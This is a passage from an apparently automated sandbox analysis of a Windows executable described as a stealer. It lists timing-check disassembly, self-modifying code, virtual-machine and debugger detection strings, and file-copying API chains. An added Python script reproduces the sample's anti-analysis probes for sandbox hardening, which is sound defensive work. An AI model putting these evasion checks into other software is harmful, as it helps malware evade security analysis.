                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82969 second address: B8298E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FE784D2BEC3h 0x0000000a pushad 0x0000000b js 00007FE784D2BEB6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8298E second address: B8299A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82AD8 second address: B82AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82AE1 second address: B82B00 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007FE784B99A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE784B99A2Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82B00 second address: B82B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE138 second address: BEE13C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECC31 second address: BECC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECC35 second address: BECC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDB6 second address: BECDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007FE784B99A3Bh 0x0000000c jmp 00007FE784B99A2Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDD3 second address: BECDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDD7 second address: BECDE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FE784B99A26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECDE9 second address: BECDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED07C second address: BED090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE784B99A30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED21A second address: BED220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED220 second address: BED225 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED35D second address: BED361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE09 second address: BEDE17 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE17 second address: BEDE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE1B second address: BEDE27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE27 second address: BEDE2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE2B second address: BEDE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FE784B99A40h 0x0000000c jmp 00007FE784B99A34h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE4D second address: BEDE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE57 second address: BEDE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE5B second address: BEDE67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE67 second address: BEDE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF05B0 second address: BF05BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF05BF second address: BF05D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A2Dh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF05D3 second address: BF05D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C00ADA second address: C00AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE784B99A37h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0230C second address: C02310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0214D second address: C02177 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE784B99A26h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE784B99A2Dh 0x00000015 jnl 00007FE784B99A26h 0x0000001b jne 00007FE784B99A26h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02177 second address: C02183 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE784D2BEBEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062D9 second address: C062DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C062DD second address: C062E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDAC7 second address: BFDAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FE784B99A26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFDAD4 second address: BFDAEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push ebx 0x0000000f ja 00007FE784D2BEB6h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23130 second address: C23144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C23144 second address: C2314E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2359E second address: C235A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25914 second address: C25956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FE784D2BEC3h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 jmp 00007FE784D2BEC4h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C25956 second address: C2595A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2578F second address: C25795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29C16 second address: C29C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 nop 0x00000007 pushad 0x00000008 mov ax, B6A4h 0x0000000c mov dword ptr [ebp+122D2A4Fh], ecx 0x00000012 popad 0x00000013 push 00000004h 0x00000015 push DFA79E64h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29C36 second address: C29C3C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29E64 second address: C29E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527046C second address: 52704C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FE784D2BEC4h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE784D2BEBDh 0x0000001c sbb cl, 00000066h 0x0000001f jmp 00007FE784D2BEC1h 0x00000024 popfd 0x00000025 call 00007FE784D2BEC0h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52704C6 second address: 5270513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE784B99A2Eh 0x00000009 add si, 6338h 0x0000000e jmp 00007FE784B99A2Bh 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE784B99A34h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE784B99A2Ah 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270513 second address: 5270522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270557 second address: 5270577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov eax, 526552A3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270577 second address: 52705C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE784D2BEC8h 0x00000008 and cl, FFFFFFE8h 0x0000000b jmp 00007FE784D2BEBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ax, DFDFh 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE784D2BEC7h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52705C4 second address: 52705CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4682E second address: B46832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46832 second address: B46836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46C10 second address: B46C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 99D964 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B3D223 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision | graph_0-37506
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B1160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1763680233.00000000014A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000002.1763680233.00000000014DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWr
Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1763680233.00000000014D1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareh
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36333
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36338
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36318
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36321
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36373
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-36207
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B4610 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C9AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
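The memory string in the previous section containing \\.\Oreans.vxd, Software\WinLicense and HARDWARE\ACPI\DSDT\VBOX__ identifies the Oreans WinLicense protector, and the SoftICE device names (NTICE, SICE, SIWVID), Sysinternals window classes and BIOS/display-driver registry reads recorded here are consistent with that protector's environment checks rather than with the stealer payload itself. An analyst who wants a sandbox to get past them needs to know which probes fire on that machine. The script below is an added example (mine, not code from the report or the sample): it reproduces the three probe types from the report's own lists and reports which would trigger. The window names, device names and registry values are taken verbatim from the rows above; the VM marker substrings are an assumption based on the memory strings the report found (VBOX__, VMware, Hyper-V), and the embedded snapshot is constructed, not captured.

```python
"""Analysis-VM hygiene check for the probes this report attributes to the sample.

Added example, not code from the report or the sample.  evaluate() is pure and
works everywhere; collect_snapshot() gathers live values on Windows only.
"""
import sys
from typing import Dict, List

# Window class names / titles the sample opens (from the report).
WINDOW_NAMES = [
    "regmonclass", "gbdyllo",
    "process monitor - sysinternals: www.sysinternals.com",
    "procmon_window_class",
    "registry monitor - sysinternals: www.sysinternals.com",
    "ollydbg", "filemonclass",
    "file monitor - sysinternals: www.sysinternals.com",
]
# Device names the sample opens (from the report); opened as \\.\NAME.
DEVICE_NAMES = ["NTICE", "SICE", "SIWVID"]
# HKLM-relative registry values the sample reads (from the report).  The
# GUID is the display-adapter device class.
REGISTRY_VALUES = [
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000",
     "DriverDesc"),
]
# Assumption: substrings a hypervisor check would look for, compared upper-case.
VM_MARKERS = ["VBOX", "VIRTUALBOX", "VMWARE", "HYPER-V"]

Snapshot = Dict[str, object]  # {"windows": set, "devices": set, "registry": dict}


def registry_text(value) -> str:
    """REG_MULTI_SZ comes back as a list; normalise to one upper-case string."""
    if isinstance(value, (list, tuple)):
        value = " ".join(str(v) for v in value)
    return str(value).upper()


def evaluate(snapshot: Snapshot) -> List[str]:
    """Return a description of every probe that would fire on this snapshot."""
    hits: List[str] = []
    for name in WINDOW_NAMES:
        if name in snapshot["windows"]:
            hits.append("window present: %s" % name)
    for dev in DEVICE_NAMES:
        if dev in snapshot["devices"]:
            hits.append("device opened: \\\\.\\%s" % dev)
    for key, value_name in REGISTRY_VALUES:
        text = registry_text(snapshot["registry"].get((key, value_name), ""))
        for marker in VM_MARKERS:
            if marker in text:
                hits.append("registry %s\\%s contains %s" % (key, value_name, marker))
                break
    return hits


def collect_snapshot() -> Snapshot:
    """Gather the live values on Windows; other platforms get an empty snapshot."""
    snap: Snapshot = {"windows": set(), "devices": set(), "registry": {}}
    if sys.platform != "win32":
        return snap
    import ctypes
    import winreg
    user32, kernel32 = ctypes.windll.user32, ctypes.windll.kernel32
    for name in WINDOW_NAMES:          # class name first, then window title
        raw = name.encode("ascii")
        if user32.FindWindowA(raw, None) or user32.FindWindowA(None, raw):
            snap["windows"].add(name)
    kernel32.CreateFileA.restype = ctypes.c_void_p
    invalid = (1 << (8 * ctypes.sizeof(ctypes.c_void_p))) - 1  # INVALID_HANDLE_VALUE
    for dev in DEVICE_NAMES:           # GENERIC_READ, OPEN_EXISTING
        h = kernel32.CreateFileA(b"\\\\.\\" + dev.encode("ascii"),
                                 0x80000000, 0, None, 3, 0, None)
        if h not in (None, invalid):
            kernel32.CloseHandle(ctypes.c_void_p(h))
            snap["devices"].add(dev)
    for key, value_name in REGISTRY_VALUES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                snap["registry"][(key, value_name)] = winreg.QueryValueEx(k, value_name)[0]
        except OSError:
            pass
    return snap


# Constructed snapshot shaped like an unhardened VirtualBox guest running
# Process Monitor; values are illustrative, not captured from a real host.
EXAMPLE_SNAPSHOT: Snapshot = {
    "windows": {"procmon_window_class"},
    "devices": set(),
    "registry": {
        (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"): ["VBOX   - 1"],
        (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"):
            ["Oracle VM VirtualBox Version 7.0.0 VBE Adapter"],
        (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000",
         "DriverDesc"): "VirtualBox Graphics Adapter",
    },
}

if __name__ == "__main__":
    live = collect_snapshot() if sys.platform == "win32" else EXAMPLE_SNAPSHOT
    for hit in evaluate(live) or ["no probe fired"]:
        print(hit)
```

Run on a Windows analysis VM it prints the probes that would fire there; on any other platform it evaluates the constructed snapshot, which trips four of them (the Process Monitor window and all three registry values). The device probe is deliberately a real CreateFileA on \\.\SICE and friends, since a user-mode check cannot tell whether such a device exists any other way.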

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
